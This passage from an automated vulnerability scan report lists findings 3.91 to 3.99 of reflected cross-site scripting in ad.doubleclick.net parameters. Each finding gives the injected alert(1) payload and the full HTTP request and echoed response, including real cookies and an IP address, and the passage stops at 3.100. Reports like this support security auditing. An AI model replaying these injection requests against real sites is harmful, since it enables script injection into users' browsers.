GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=7dfb5"-alert(1)-"406b18d8a5c&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=7dfb5"-alert(1)-"406b18d8a5c&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcal
...[SNIP]...

3.91. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [cpnmodule parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ba13"-alert(1)-"266cdf29ddf was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=1ba13"-alert(1)-"266cdf29ddf&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=1ba13"-alert(1)-"266cdf29ddf&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
v
...[SNIP]...

3.92. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a000c"-alert(1)-"a796382a003 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=a000c"-alert(1)-"a796382a003&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=a000c"-alert(1)-"a796382a003&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/h
...[SNIP]...

3.93. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [epartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56f8d"-alert(1)-"1d00a0e4e7e was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=56f8d"-alert(1)-"1d00a0e4e7e&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=56f8d"-alert(1)-"1d00a0e4e7e&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var w
...[SNIP]...

3.94. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [event parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18f6d"-alert(1)-"51b7a82ca5c was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=18f6d"-alert(1)-"51b7a82ca5c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5755
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:22:49 GMT
Expires: Wed, 27 Apr 2011 23:22:49 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
0&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=18f6d"-alert(1)-"51b7a82ca5chttp://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH =
...[SNIP]...

3.95. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae410"-alert(1)-"76768d80340 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cnae410"-alert(1)-"76768d80340&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5764

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
/3af6/17/160/%2a/r%3B234979442%3B0-0%3B0%3B57848298%3B4307-300/250%3B38213956/38231713/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cnae410"-alert(1)-"76768d80340&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243
...[SNIP]...

3.96. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d8a3"-alert(1)-"87b5e52dc7f was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US9d8a3"-alert(1)-"87b5e52dc7f&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5764

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
d%3B234979442%3B1-0%3B0%3B57848298%3B4307-300/250%3B38213964/38231721/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US9d8a3"-alert(1)-"87b5e52dc7f&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760
...[SNIP]...

3.97. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [nd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23571"-alert(1)-"929e9d3e54f was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=10023571"-alert(1)-"929e9d3e54f&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=10023571"-alert(1)-"929e9d3e54f&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.2
...[SNIP]...

3.98. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af8af"-alert(1)-"f718173ff91 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253aaf8af"-alert(1)-"f718173ff91&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
%3Dv8/3af6/17/160/%2a/i%3B234979442%3B2-0%3B0%3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253aaf8af"-alert(1)-"f718173ff91&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.21
...[SNIP]...

3.99. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [oepartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebd9b"-alert(1)-"c91cb2fcc46 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=ebd9b"-alert(1)-"c91cb2fcc46&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=ebd9b"-alert(1)-"c91cb2fcc46&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.htm
...[SNIP]...

3.100. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [orh parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

